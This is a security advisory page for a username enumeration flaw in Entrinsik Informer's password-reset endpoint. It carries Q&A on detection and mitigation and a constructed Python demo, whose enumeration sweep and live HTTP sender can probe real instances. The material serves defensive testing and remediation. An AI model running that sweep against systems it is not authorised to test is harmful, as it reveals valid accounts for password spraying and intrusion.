CVE-2025-65185
Username Enumeration via OTP in Entrinsik Informer v
Publication date: 2025-12-17
Last updated on: 2025-12-17
Assigner: MITRE
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| entrinsik | informer | 5.10.1 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-203 | The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-65185 is a username enumeration weakness (CWE-203, observable response discrepancy) in Entrinsik Informer version 5.10.1. It sits in the 'Forgot Password' flow: when a username and a one-time code are submitted, the application's response depends on whether the username exists. For a valid username the server returns HTTP 422 with an 'incorrect code' error; for an unknown username it returns HTTP 404 stating that the user was not found. Because account existence is reported before the code is validated, an attacker who holds no code at all can submit a junk code for each candidate name and read the status code as a yes/no oracle, which makes bulk discovery of valid accounts trivial to automate. [2]
How can this vulnerability impact me?
This vulnerability allows attackers to identify valid usernames within the Entrinsik Informer application. Knowing valid usernames facilitates more targeted attacks such as password spraying and helps attackers map user roles within the environment, increasing the risk of unauthorized access and potential compromise of sensitive information. [2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection is a differential test against the /api/change-password endpoint: send a POST request that supplies a username known to exist together with a deliberately wrong code, repeat it with a username that certainly does not exist, and compare the two responses. On an affected instance the valid username yields 422 Unprocessable Entity with an 'incorrect code' message while the unknown one yields 404 Not Found with a 'user not found' message; identical status and body for both means the oracle is absent. Burp Suite Intruder can automate the sweep over a username wordlist and sort the results by status code. Run this only against instances you own or are authorised to test, and note that a burst of failed requests to this endpoint from a single source is the pattern a defender should alert on. [2]
What immediate steps should I take to mitigate this vulnerability?
The fix is to remove the observable difference. Return the same status code and the same body for an unknown username and for a wrong code, for example a generic message such as 'An email has been sent with password reset instructions. If you do not receive an email within 5 minutes, please try again', regardless of whether the username is valid, and keep login failures equally generic ('Invalid credentials'). Close the side channels too: perform the same amount of work on both paths (look up a placeholder record and run the code comparison even when the user does not exist) so that response time and response size do not differ. Until the application is patched, rate-limit the endpoint per source address and per account and monitor it for sweeps of failed requests. [2]
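The detection and the mitigation described in the two answers above, as an added, constructed Python example that is not the page's or the vendor's code. The two handlers are stand-ins: `vulnerable_change_password` reproduces the 404/422 split the advisory describes, `hardened_change_password` returns one status and one body for both failure cases and does the same work on both paths. The JSON field names `username` and `code` and the exact error strings are assumptions; only the `/api/change-password` path appears on this page.

```python
"""Constructed demo of a response-discrepancy oracle (CWE-203) and its fix.

Not Entrinsik Informer code. Assumed request shape: POST /api/change-password
with a JSON body {"username": ..., "code": ...}; the field names and the error
strings are stand-ins modelled on the 404/422 behaviour the advisory describes.
"""
import hmac
import json
import secrets
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

Response = Tuple[int, str]               # (HTTP status, response body)
Sender = Callable[[str, str], Response]  # (username, code) -> response

# Constructed user store: username -> the one-time code currently issued to that user.
USERS: Dict[str, str] = {"alice": "482913", "bob": "117654"}


def vulnerable_change_password(username: str, code: str) -> Response:
    """Models the advisory: account existence is reported before the code is checked."""
    expected = USERS.get(username)
    if expected is None:
        return 404, '{"error": "User not found"}'      # leaks: no such account
    if not hmac.compare_digest(expected.encode(), code.encode()):
        return 422, '{"error": "Incorrect code"}'       # leaks: account exists
    return 200, '{"status": "password changed"}'


# Random per process and 32 hex characters long, so no client-supplied code can match it.
_DUMMY_CODE = secrets.token_hex(16)


def hardened_change_password(username: str, code: str) -> Response:
    """Unknown user and wrong code share one status, one body and the same work."""
    expected = USERS.get(username, _DUMMY_CODE)                       # lookup on both paths
    code_ok = hmac.compare_digest(expected.encode(), code.encode())  # compare on both paths
    if not (code_ok and username in USERS):
        return 400, '{"status": "If this account exists, password reset instructions have been sent"}'
    return 200, '{"status": "password changed"}'


def classify(resp: Response) -> str:
    """Turn one response into a verdict using the discrepancy the advisory describes."""
    status, body = resp
    if status == 422 and "incorrect code" in body.lower():
        return "valid"
    if status == 404 and "not found" in body.lower():
        return "invalid"
    return "indeterminate"


def enumerate_users(send: Sender, candidates: Iterable[str]) -> Dict[str, str]:
    """Attacker view: probe every candidate with a junk code; the response is the oracle."""
    return {name: classify(send(name, "000000")) for name in candidates}


def oracle_present(send: Sender, known_user: str, unknown_user: str = "zz-no-such-user-zz") -> bool:
    """Defender check: do a real and a fake account get different responses to a wrong code?"""
    return send(known_user, "000000") != send(unknown_user, "000000")


def http_sender(base_url: str, timeout: float = 10.0) -> Sender:
    """Build a Sender for a live instance you are authorised to test (assumed request shape)."""
    def send(username: str, code: str) -> Response:
        payload = json.dumps({"username": username, "code": code}).encode()
        req = urllib.request.Request(
            base_url.rstrip("/") + "/api/change-password",
            data=payload,
            headers={"Content-Type": "application/json"},
            method="POST",
        )
        try:
            with urllib.request.urlopen(req, timeout=timeout) as r:
                return r.status, r.read().decode(errors="replace")
        except urllib.error.HTTPError as e:  # 4xx/5xx responses still carry the oracle
            return e.code, e.read().decode(errors="replace")
    return send


if __name__ == "__main__":
    names = ["alice", "carol", "bob"]
    print("vulnerable:", enumerate_users(vulnerable_change_password, names))
    print("hardened:  ", enumerate_users(hardened_change_password, names))
    print("oracle on vulnerable:", oracle_present(vulnerable_change_password, "alice"))
    print("oracle on hardened:  ", oracle_present(hardened_change_password, "alice"))
```

Running the module offline shows the sweep recovering `alice` and `bob` from the vulnerable handler and returning only `indeterminate` against the hardened one; `oracle_present` is the two-request check a defender can point at a real instance via `http_sender`, and it is the same check the hardened handler must pass before the fix is considered complete.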